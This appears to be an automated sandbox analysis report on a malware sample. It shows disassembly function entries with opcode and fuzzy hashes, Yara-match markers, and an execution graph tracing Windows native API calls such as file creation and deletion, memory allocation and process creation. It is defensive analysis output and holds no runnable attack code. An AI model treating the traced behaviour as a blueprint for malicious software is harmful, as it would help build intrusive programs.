                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: 4508254c04379d839b8ba8c779f0388a746cfe5e0643c2986c1cef015ae8448f
                                                                                  • Instruction ID: 72660e0720a7e10e1685109e9631ad698e2753e368d241e30f5de913d04b96b1
                                                                                  • Opcode Fuzzy Hash: 4508254c04379d839b8ba8c779f0388a746cfe5e0643c2986c1cef015ae8448f
                                                                                  • Instruction Fuzzy Hash: DF3198B6A00619AFCB20DF29DC45BFE77F8FF44610F440556E949E3201EB30EA44ABA1
                                                                                  Function 05787D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                  • Instruction ID: c6c8ae0bfd229dd89def28abae5e8dbe3bbc20cd079e763ccfa89a144aee56fe
                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                  • Instruction Fuzzy Hash: 9991D9B0E842159BDF2CEE69C881ABEB7A6FF44320F744519E857E72C0D7318942E720
                                                                                  Function 05749126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: 4ea78f5c7b0a745c25510d1f0fdb89ef4f6ab6eec82b9a9d7fc3a39dfaa37c60
                                                                                  • Instruction ID: 9bfdcc24ea19614ee8e2f8ec231690ee0fa1df3623912d40d9d5a3e8ee93223b
                                                                                  • Opcode Fuzzy Hash: 4ea78f5c7b0a745c25510d1f0fdb89ef4f6ab6eec82b9a9d7fc3a39dfaa37c60
                                                                                  • Instruction Fuzzy Hash: A1812C76D042699BDB25DF54CC49BEEB7B4BB48710F0042EAEA19B7640E7705E80DFA0

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.9%
                                                                                  Dynamic/Decrypted Code Coverage:4.2%
                                                                                  Signature Coverage:2.2%
                                                                                  Total number of Nodes:451
                                                                                  Total number of Limit Nodes:75
                                                                                  execution_graph 84612 409b80 84615 409f04 84612->84615 84614 40a20b 84615->84614 84616 42ae10 84615->84616 84617 42ae33 84616->84617 84622 404110 84617->84622 84619 42ae3f 84620 42ae78 84619->84620 84625 425350 84619->84625 84620->84614 84629 412e80 84622->84629 84624 40411d 84624->84619 84626 4253b2 84625->84626 84628 4253bf 84626->84628 84653 411640 84626->84653 84628->84620 84630 412e9a 84629->84630 84632 412eb3 84630->84632 84633 429b50 84630->84633 84632->84624 84635 429b6a 84633->84635 84634 429b99 84634->84632 84635->84634 84640 428710 84635->84640 84641 42872a 84640->84641 84647 4602c0a 84641->84647 84642 428756 84644 42b1a0 84642->84644 84650 429450 84644->84650 84646 429c12 84646->84632 84648 4602c11 84647->84648 84649 4602c1f LdrInitializeThunk 84647->84649 84648->84642 84649->84642 84651 42946d 84650->84651 84652 42947e RtlFreeHeap 84651->84652 84652->84646 84654 411678 84653->84654 84669 417b20 84654->84669 84656 411680 84667 41194d 84656->84667 84680 42b280 84656->84680 84658 411696 84659 42b280 RtlAllocateHeap 84658->84659 84660 4116a7 84659->84660 84661 42b280 RtlAllocateHeap 84660->84661 84662 4116b8 84661->84662 84668 41174f 84662->84668 84691 4166a0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 84662->84691 84665 411902 84687 427c90 84665->84687 84667->84628 84683 4141c0 84668->84683 84670 417b4c 84669->84670 84692 417a10 84670->84692 84673 417b91 84675 417bad 84673->84675 84678 4290d0 NtClose 84673->84678 84674 417b79 84676 417b84 84674->84676 84698 4290d0 84674->84698 84675->84656 84676->84656 84679 417ba3 84678->84679 84679->84656 84706 429400 84680->84706 84682 42b29b 84682->84658 84684 4141e4 84683->84684 84685 414220 LdrLoadDll 84684->84685 84686 4141eb 84684->84686 84685->84686 84686->84665 84688 427cf1 84687->84688 84690 427cfe 84688->84690 84709 411960 84688->84709 84690->84667 84691->84668 84693 417a2a 84692->84693 84697 417b06 84692->84697 84701 4287b0 84693->84701 84696 4290d0 NtClose 84696->84697 84697->84673 84697->84674 84699 4290ea 84698->84699 84700 4290fb NtClose 84699->84700 84700->84676 84702 4287ca 84701->84702 84705 46035c0 LdrInitializeThunk 84702->84705 84703 417afa 84703->84696 84705->84703 84707 42941d 84706->84707 84708 42942e RtlAllocateHeap 84707->84708 84708->84682 84725 417df0 84709->84725 84711 411ef6 84711->84690 84712 411980 84712->84711 84729 420e20 84712->84729 84715 411b9f 84737 42c490 84715->84737 84717 4119de 84717->84711 84732 42c360 84717->84732 84719 411bb4 84721 411c07 84719->84721 84743 410490 84719->84743 84721->84711 84723 410490 LdrInitializeThunk 84721->84723 84746 417d90 84721->84746 84722 417d90 LdrInitializeThunk 84724 411d63 84722->84724 84723->84721 84724->84721 84724->84722 84726 417dfd 84725->84726 84727 417e25 84726->84727 84728 417e1e SetErrorMode 84726->84728 84727->84712 84728->84727 84731 420e41 84729->84731 84750 42b110 84729->84750 84731->84717 84733 42c370 84732->84733 84734 42c376 84732->84734 84733->84715 84735 42b280 RtlAllocateHeap 84734->84735 84736 42c39c 84735->84736 84736->84715 84738 42c400 84737->84738 84739 42b280 RtlAllocateHeap 84738->84739 84741 42c45d 84738->84741 84740 42c43a 84739->84740 84742 42b1a0 RtlFreeHeap 84740->84742 84741->84719 84742->84741 84744 4104b2 84743->84744 84757 429370 84743->84757 84744->84724 84747 417da3 84746->84747 84762 428610 84747->84762 84749 417dce 84749->84721 84753 429240 84750->84753 84752 42b141 84752->84731 84754 4292d8 84753->84754 84756 42926e 84753->84756 84755 4292ee NtAllocateVirtualMemory 84754->84755 84755->84752 84756->84752 84758 42938a 84757->84758 84761 4602c70 LdrInitializeThunk 84758->84761 84759 4293b2 84759->84744 84761->84759 84763 42868e 84762->84763 84765 42863b 84762->84765 84767 4602dd0 LdrInitializeThunk 84763->84767 84764 4286b3 84764->84749 84765->84749 84767->84764 84768 41fe00 84769 41fe1d 84768->84769 84770 4141c0 LdrLoadDll 84769->84770 84771 41fe3b 84770->84771 84772 41f500 84773 41f564 84772->84773 84801 415f40 84773->84801 84775 41f69e 84776 41f697 84776->84775 84808 416050 84776->84808 84778 41f843 84779 41f71a 84779->84778 84780 41f852 84779->84780 84812 41f2e0 84779->84812 84781 4290d0 NtClose 84780->84781 84783 41f85c 84781->84783 84784 41f756 84784->84780 84785 41f761 84784->84785 84786 42b280 RtlAllocateHeap 84785->84786 84787 41f78a 84786->84787 84788 41f793 84787->84788 84789 41f7a9 84787->84789 84790 4290d0 NtClose 84788->84790 84821 41f1d0 CoInitialize 84789->84821 84792 41f79d 84790->84792 84793 41f7b7 84824 428b80 84793->84824 84795 41f832 84796 4290d0 NtClose 84795->84796 84797 41f83c 84796->84797 84798 42b1a0 RtlFreeHeap 84797->84798 84798->84778 84799 41f7d5 84799->84795 84800 428b80 LdrInitializeThunk 84799->84800 84800->84799 84803 415f73 84801->84803 84802 415f97 84802->84776 84803->84802 84828 428c30 84803->84828 84805 415fba 84805->84802 84806 4290d0 NtClose 84805->84806 84807 41603a 84806->84807 84807->84776 84809 416075 84808->84809 84833 428a30 84809->84833 84813 41f2f5 84812->84813 84814 4141c0 LdrLoadDll 84813->84814 84816 41f31a 84814->84816 84815 41f323 84815->84784 84816->84815 84817 4141c0 LdrLoadDll 84816->84817 84818 41f3ee 84817->84818 84819 4141c0 LdrLoadDll 84818->84819 84820 41f44b 84818->84820 84819->84820 84820->84784 84823 41f235 84821->84823 84822 41f2cb CoUninitialize 84822->84793 84823->84822 84825 428b9d 84824->84825 84838 4602ba0 LdrInitializeThunk 84825->84838 84826 428bcd 84826->84799 84829 428c4a 84828->84829 84832 4602ca0 LdrInitializeThunk 84829->84832 84830 428c76 84830->84805 84832->84830 84834 428a4d 84833->84834 84837 4602c60 LdrInitializeThunk 84834->84837 84835 4160e9 84835->84779 84837->84835 84838->84826 84839 4286c0 84840 4286dd 84839->84840 84843 4602df0 LdrInitializeThunk 84840->84843 84841 428705 84843->84841 84844 428540 84845 4285d2 84844->84845 84846 42856e 84844->84846 84849 4602ee0 LdrInitializeThunk 84845->84849 84847 428603 84849->84847 84850 425dc0 84851 425e1a 84850->84851 84853 425e27 84851->84853 84854 4237c0 84851->84854 84855 42b110 NtAllocateVirtualMemory 84854->84855 84857 423801 84855->84857 84856 42390e 84856->84853 84857->84856 84858 4141c0 LdrLoadDll 84857->84858 84860 423847 84858->84860 84859 423890 Sleep 84859->84860 84860->84856 84860->84859 84861 42c3c0 84862 42b1a0 RtlFreeHeap 84861->84862 84863 42c3d5 84862->84863 84864 40b1d0 84865 42b110 NtAllocateVirtualMemory 84864->84865 84866 40c841 84864->84866 84865->84866 84868 416a10 84869 416a3a 84868->84869 84872 417bc0 84869->84872 84871 416a64 84873 417bdd 84872->84873 84879 428800 84873->84879 84875 417c2d 84876 417c34 84875->84876 84884 4288e0 84875->84884 84876->84871 84878 417c5d 84878->84871 84880 42889e 84879->84880 84882 42882e 84879->84882 84889 4602f30 LdrInitializeThunk 84880->84889 84881 4288d7 84881->84875 84882->84875 84885 428991 84884->84885 84887 42890f 84884->84887 84890 4602d10 LdrInitializeThunk 84885->84890 84886 4289d6 84886->84878 84887->84878 84889->84881 84890->84886 84891 428dd0 84892 428e8a 84891->84892 84894 428e02 84891->84894 84893 428ea0 NtCreateFile 84892->84893 84895 409b20 84897 409b2f 84895->84897 84896 409b70 84897->84896 84898 409b5d CreateThread 84897->84898 84899 417020 84900 416fd1 84899->84900 84901 41704d 84899->84901 84902 417002 84900->84902 84904 41af20 84900->84904 84905 41af46 84904->84905 84906 41b179 84905->84906 84931 4294e0 84905->84931 84906->84902 84908 41afbc 84908->84906 84909 42c490 2 API calls 84908->84909 84910 41afdb 84909->84910 84910->84906 84911 41b0b2 84910->84911 84912 428710 LdrInitializeThunk 84910->84912 84914 4157b0 LdrInitializeThunk 84911->84914 84919 41b0d1 84911->84919 84913 41b03d 84912->84913 84913->84911 84915 41b046 84913->84915 84914->84919 84915->84906 84916 41b09a 84915->84916 84920 41b078 84915->84920 84934 4157b0 84915->84934 84917 417d90 LdrInitializeThunk 84916->84917 84921 41b0a8 84917->84921 84918 41b161 84923 417d90 LdrInitializeThunk 84918->84923 84919->84918 84938 428280 84919->84938 84953 4244d0 LdrInitializeThunk 84920->84953 84921->84902 84927 41b16f 84923->84927 84926 41b138 84943 428330 84926->84943 84927->84902 84929 41b152 84948 428490 84929->84948 84932 4294fd 84931->84932 84933 42950e CreateProcessInternalW 84932->84933 84933->84908 84935 4157b3 84934->84935 84936 4288e0 LdrInitializeThunk 84935->84936 84937 4157ee 84936->84937 84937->84920 84939 4282fd 84938->84939 84940 4282ab 84938->84940 84954 46039b0 LdrInitializeThunk 84939->84954 84940->84926 84941 428322 84941->84926 84944 4283ad 84943->84944 84946 42835b 84943->84946 84955 4604340 LdrInitializeThunk 84944->84955 84945 4283d2 84945->84929 84946->84929 84949 4284be 84948->84949 84950 428510 84948->84950 84949->84918 84956 4602fb0 LdrInitializeThunk 84950->84956 84951 428535 84951->84918 84953->84916 84954->84941 84955->84945 84956->84951 84957 41c2a0 84958 41c2c9 84957->84958 84959 41c3cd 84958->84959 84960 41c373 FindFirstFileW 84958->84960 84960->84959 84962 41c38e 84960->84962 84961 41c3b4 FindNextFileW 84961->84962 84963 41c3c6 FindClose 84961->84963 84962->84961 84963->84959 84964 421460 84965 42147c 84964->84965 84966 4214a4 84965->84966 84967 4214b8 84965->84967 84968 4290d0 NtClose 84966->84968 84969 4290d0 NtClose 84967->84969 84970 4214ad 84968->84970 84971 4214c1 84969->84971 84974 42b2c0 RtlAllocateHeap 84971->84974 84973 4214cc 84974->84973 84990 420fe1 85002 428f40 84990->85002 84992 421020 84994 4290d0 NtClose 84992->84994 84993 421035 84995 4290d0 NtClose 84993->84995 84997 421029 84994->84997 84999 42103e 84995->84999 84996 421002 84996->84992 84996->84993 84998 421075 84999->84998 85000 42b1a0 RtlFreeHeap 84999->85000 85001 421069 85000->85001 85003 428fe7 85002->85003 85005 428f6b 85002->85005 85004 428ffd NtReadFile 85003->85004 85004->84996 85005->84996 85006 4123e8 85007 415f40 2 API calls 85006->85007 85008 412413 85007->85008 85009 410a6b PostThreadMessageW 85010 410a7d 85009->85010 85011 4602ad0 LdrInitializeThunk 85012 415830 85013 415860 85012->85013 85014 417d90 LdrInitializeThunk 85012->85014 85016 41588c 85013->85016 85017 417d10 85013->85017 85014->85013 85018 417d54 85017->85018 85023 417d75 85018->85023 85024 4283e0 85018->85024 85020 417d65 85021 417d81 85020->85021 85022 4290d0 NtClose 85020->85022 85021->85013 85022->85023 85023->85013 85025 42845d 85024->85025 85027 42840b 85024->85027 85029 4604650 LdrInitializeThunk 85025->85029 85026 428482 85026->85020 85027->85020 85029->85026 85030 4198b0 85031 4198c6 85030->85031 85032 4198cb 85030->85032 85033 4198fd 85032->85033 85034 42b1a0 RtlFreeHeap 85032->85034 85034->85033 85035 41a9f0 85040 41a700 85035->85040 85037 41a9fd 85054 41a370 85037->85054 85039 41aa19 85041 41a725 85040->85041 85065 418000 85041->85065 85044 41a873 85044->85037 85046 41a88a 85046->85037 85047 41a881 85047->85046 85049 41a977 85047->85049 85084 419dc0 85047->85084 85051 41a9da 85049->85051 85093 41a130 85049->85093 85052 42b1a0 RtlFreeHeap 85051->85052 85053 41a9e1 85052->85053 85053->85037 85055 41a386 85054->85055 85062 41a391 85054->85062 85056 42b280 RtlAllocateHeap 85055->85056 85056->85062 85057 41a3b5 85057->85039 85058 418000 GetFileAttributesW 85058->85062 85059 41a6d2 85060 41a6eb 85059->85060 85061 42b1a0 RtlFreeHeap 85059->85061 85060->85039 85061->85060 85062->85057 85062->85058 85062->85059 85063 419dc0 RtlFreeHeap 85062->85063 85064 41a130 RtlFreeHeap 85062->85064 85063->85062 85064->85062 85066 418021 85065->85066 85067 418028 GetFileAttributesW 85066->85067 85068 418033 85066->85068 85067->85068 85068->85044 85069 423090 85068->85069 85070 42309e 85069->85070 85071 4230a5 85069->85071 85070->85047 85072 4141c0 LdrLoadDll 85071->85072 85073 4230da 85072->85073 85074 4230e9 85073->85074 85097 422b50 LdrLoadDll 85073->85097 85076 42b280 RtlAllocateHeap 85074->85076 85080 423297 85074->85080 85077 423102 85076->85077 85078 42328d 85077->85078 85077->85080 85081 42311e 85077->85081 85079 42b1a0 RtlFreeHeap 85078->85079 85078->85080 85079->85080 85080->85047 85081->85080 85082 42b1a0 RtlFreeHeap 85081->85082 85083 423281 85082->85083 85083->85047 85085 419de6 85084->85085 85098 41d810 85085->85098 85087 419e58 85089 419fe0 85087->85089 85090 419e76 85087->85090 85088 419fc5 85088->85047 85089->85088 85091 419c80 RtlFreeHeap 85089->85091 85090->85088 85103 419c80 85090->85103 85091->85089 85094 41a156 85093->85094 85095 41d810 RtlFreeHeap 85094->85095 85096 41a1dd 85095->85096 85096->85049 85097->85074 85100 41d834 85098->85100 85099 41d841 85099->85087 85100->85099 85101 42b1a0 RtlFreeHeap 85100->85101 85102 41d884 85101->85102 85102->85087 85104 419c9d 85103->85104 85107 41d8a0 85104->85107 85106 419da3 85106->85090 85108 41d8c4 85107->85108 85109 41d96e 85108->85109 85110 42b1a0 RtlFreeHeap 85108->85110 85109->85106 85110->85109 85111 416db0 85112 416dcc 85111->85112 85115 416e1f 85111->85115 85114 4290d0 NtClose 85112->85114 85112->85115 85113 416f51 85118 416de7 85114->85118 85115->85113 85122 4161d0 NtClose LdrInitializeThunk LdrInitializeThunk 85115->85122 85117 416f2e 85117->85113 85123 4163a0 NtClose LdrInitializeThunk LdrInitializeThunk 85117->85123 85121 4161d0 NtClose LdrInitializeThunk LdrInitializeThunk 85118->85121 85121->85115 85122->85117 85123->85113 85124 429030 85125 4290a7 85124->85125 85127 42905b 85124->85127 85126 4290bd NtDeleteFile 85125->85126 85128 412d73 85129 417a10 2 API calls 85128->85129 85130 412d83 85129->85130 85131 4290d0 NtClose 85130->85131 85132 412d9f 85130->85132 85131->85132 85133 4217f0 85134 421809 85133->85134 85135 421851 85134->85135 85138 421891 85134->85138 85140 421896 85134->85140 85136 42b1a0 RtlFreeHeap 85135->85136 85137 421861 85136->85137 85139 42b1a0 RtlFreeHeap 85138->85139 85139->85140 85141 4184b4 85143 4184c4 85141->85143 85142 418474 85143->85142 85145 416d30 85143->85145 85146 416d46 85145->85146 85148 416d7f 85145->85148 85146->85148 85149 416ba0 LdrLoadDll 85146->85149 85148->85142 85149->85148 85150 421779 85151 42177f 85150->85151 85152 4290d0 NtClose 85151->85152 85153 421784 85151->85153 85154 4217a9 85152->85154 85155 411f7f 85156 411f18 85155->85156 85156->85155 85157 428710 LdrInitializeThunk 85156->85157 85161 411ffd 85156->85161 85158 411f46 85157->85158 85162 429170 85158->85162 85160 411f5b 85163 4291ff 85162->85163 85164 42919b 85162->85164 85167 4602e80 LdrInitializeThunk 85163->85167 85164->85160 85165 429230 85165->85160 85167->85165

                                                                                  Executed Functions

                                                                                  Function 00409B80 Relevance: 29.1, Strings: 23, Instructions: 344COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 26 409b80-409f02 27 409f04-409f0a 26->27 28 409f0d-409f11 26->28 27->28 29 409f13-409f2c 28->29 30 409f2e-409f35 28->30 29->27 31 409f40-409f46 30->31 32 409f48-409f5a 31->32 33 409f5c-409f6a 31->33 32->31 34 409f75-409f7e 33->34 36 409f80-409f8a 34->36 37 409f8c-409f9a 34->37 36->34 38 409fa5-409fab 37->38 40 409fad-409fbc 38->40 41 409fbe-409fce 38->41 40->38 42 409fd5-409fde 41->42 44 409fe4-409fe7 42->44 45 40a186-40a18d 42->45 46 409fed-409ff4 44->46 47 40a198-40a19e 45->47 50 40a025-40a02c 46->50 51 409ff6-40a023 46->51 48 40a1a0-40a1ac 47->48 49 40a1ae-40a1b5 47->49 48->47 52 40a25b-40a265 49->52 53 40a1bb-40a1bf 49->53 55 40a037-40a040 50->55 51->46 56 40a1e0-40a1e7 53->56 57 40a1c1-40a1de 53->57 58 40a042-40a052 55->58 59 40a054-40a05b 55->59 61 40a1f2-40a1f8 56->61 57->53 58->55 62 40a066-40a06f 59->62 63 40a206 call 42ae10 61->63 64 40a1fa-40a204 61->64 65 40a071-40a084 62->65 66 40a086-40a09f 62->66 71 40a20b-40a211 63->71 67 40a1e9-40a1ef 64->67 65->62 66->66 70 40a0a1-40a0a8 66->70 67->61 72 40a0b3-40a0b9 70->72 75 40a213-40a22b 71->75 76 40a22d-40a234 71->76 73 40a0d1-40a0e0 72->73 74 40a0bb-40a0c4 72->74 80 40a0e2-40a0eb 73->80 81 40a109-40a119 73->81 77 40a0c6-40a0c9 74->77 78 40a0cf 74->78 75->71 79 40a23f-40a245 76->79 77->78 78->72 79->52 84 40a247-40a259 79->84 85 40a107 80->85 86 40a0ed-40a105 80->86 81->81 82 40a11b-40a122 81->82 87 40a12d-40a133 82->87 84->79 85->45 86->80 89 40a135-40a147 87->89 90 40a149-40a15a 87->90 89->87 92 40a165-40a16b 90->92 93 40a181 92->93 94 40a16d-40a17f 92->94 93->42 94->92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: f$.l$3B$4$;h$>%$Ar$C$I$P$VS$a7$b}$d6$hx$k`$pj$vh$z\${$R$a${
                                                                                  • API String ID: 0-3243794530
                                                                                  • Opcode ID: 0d9c431eb31dcdcbb603da09a7576789e32856bc450b525457a9274449c4a1e5
                                                                                  • Instruction ID: 03c64d3dfaaf28714b5ac79fbc34456881fc18d7ad7e1a3b333f598c931f5430
                                                                                  • Opcode Fuzzy Hash: 0d9c431eb31dcdcbb603da09a7576789e32856bc450b525457a9274449c4a1e5
                                                                                  • Instruction Fuzzy Hash: 1D12A0B0D05329CBEB24CF84C9987DDBBB1BB44308F20819AD5097B381D7B95A99DF46
                                                                                  Function 0041C2A0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 0041C384
                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 0041C3BF
                                                                                  • FindClose.KERNELBASE(?), ref: 0041C3CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  • Opcode ID: 9e87784be811134206543ff6a91124e097d8d5776f875dc14713a20d1d22308b
                                                                                  • Instruction ID: 36b2de08793fd07eadd6fad27dcf3304ae29df80102fa77079a5de1b250efda6
                                                                                  • Opcode Fuzzy Hash: 9e87784be811134206543ff6a91124e097d8d5776f875dc14713a20d1d22308b
                                                                                  • Instruction Fuzzy Hash: 4131C371A00318BBDB20DB61CC85FEF737CDF44744F14445EB908A7191DA78AAC48BA8
                                                                                  Function 00428DD0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00428ED1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 8b2674f83d26bb9b9cc7bc7c46e7e21f0dfd6b85f2a87451696d0897736f1e3c
                                                                                  • Instruction ID: 50e443e416593c6712ff2e025c860828b3c5bd297b214149a3cc8e034b7e4645
                                                                                  • Opcode Fuzzy Hash: 8b2674f83d26bb9b9cc7bc7c46e7e21f0dfd6b85f2a87451696d0897736f1e3c
                                                                                  • Instruction Fuzzy Hash: 0731E4B1A04648AFCB14DF99D881EDEB7F9EF88304F50821AF919A7340D734A951CFA5
                                                                                  Function 00428F40 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00429026
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: f0a4af5ce10f85bb6fa20a4e860ade84654f9ae3d194782fdcda6e65f5ba91b7
                                                                                  • Instruction ID: 5d9db505ed945ef8b7f350511d024b445027c6ec5febbed7a2706fa73b7e5b78
                                                                                  • Opcode Fuzzy Hash: f0a4af5ce10f85bb6fa20a4e860ade84654f9ae3d194782fdcda6e65f5ba91b7
                                                                                  • Instruction Fuzzy Hash: 8231E5B5A00648AFCB14DF99D841EEFB7F9EF88314F10821AFD19A7240D634A911CFA5
                                                                                  Function 00429240 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(004119DE,?,00427CFE,00000000,00000004,00003000,?,?,?,?,?,00427CFE,004119DE), ref: 0042930B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: 41555825bf2f783df1a3daaaa86b83b36e5ea961c03c1e8bf0cfd5870d48d571
                                                                                  • Instruction ID: ecad808974ee85b35cff79529130522e26f4e42ed38775daec0018d95aabc8ef
                                                                                  • Opcode Fuzzy Hash: 41555825bf2f783df1a3daaaa86b83b36e5ea961c03c1e8bf0cfd5870d48d571
                                                                                  • Instruction Fuzzy Hash: 002137B1A04248AFDB10DF99DC41EEFB7B9EF88304F40811AFD09AB240D774A911CBA5
                                                                                  Function 00429030 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: dca963f95815fc2a62f9dc0da00cc8e01f002ad0f6542e110fb244efc6502f9a
                                                                                  • Instruction ID: cd383ec2753f830c19edc15cd8624a4d4d40f7942a6cb736d1eb1d45d579a91b
                                                                                  • Opcode Fuzzy Hash: dca963f95815fc2a62f9dc0da00cc8e01f002ad0f6542e110fb244efc6502f9a
                                                                                  • Instruction Fuzzy Hash: 1B118F71A007186AD610EA55DC01FEFB3ACDB85314F40815AF90867281D6796915CBE5
                                                                                  Function 004290D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00429104
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 93c36a3cf205b2cdfdda56150977d175043fba1793cb531f7e813bbf17b3f693
                                                                                  • Instruction ID: b039b26f07f083a67050750e89c2fdc1f12a21d443dc8365893339b3d2cbd5c3
                                                                                  • Opcode Fuzzy Hash: 93c36a3cf205b2cdfdda56150977d175043fba1793cb531f7e813bbf17b3f693
                                                                                  • Instruction Fuzzy Hash: 9CE046366206147BD620EA9ADC01F9BB7ACDBC5764F80401AFA09A7282C675B91186E9
                                                                                  Function 046035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4b6c949a57d0fad1615afe7d6e8aafbc91a03e5c723051488ab88fad5f7df87c
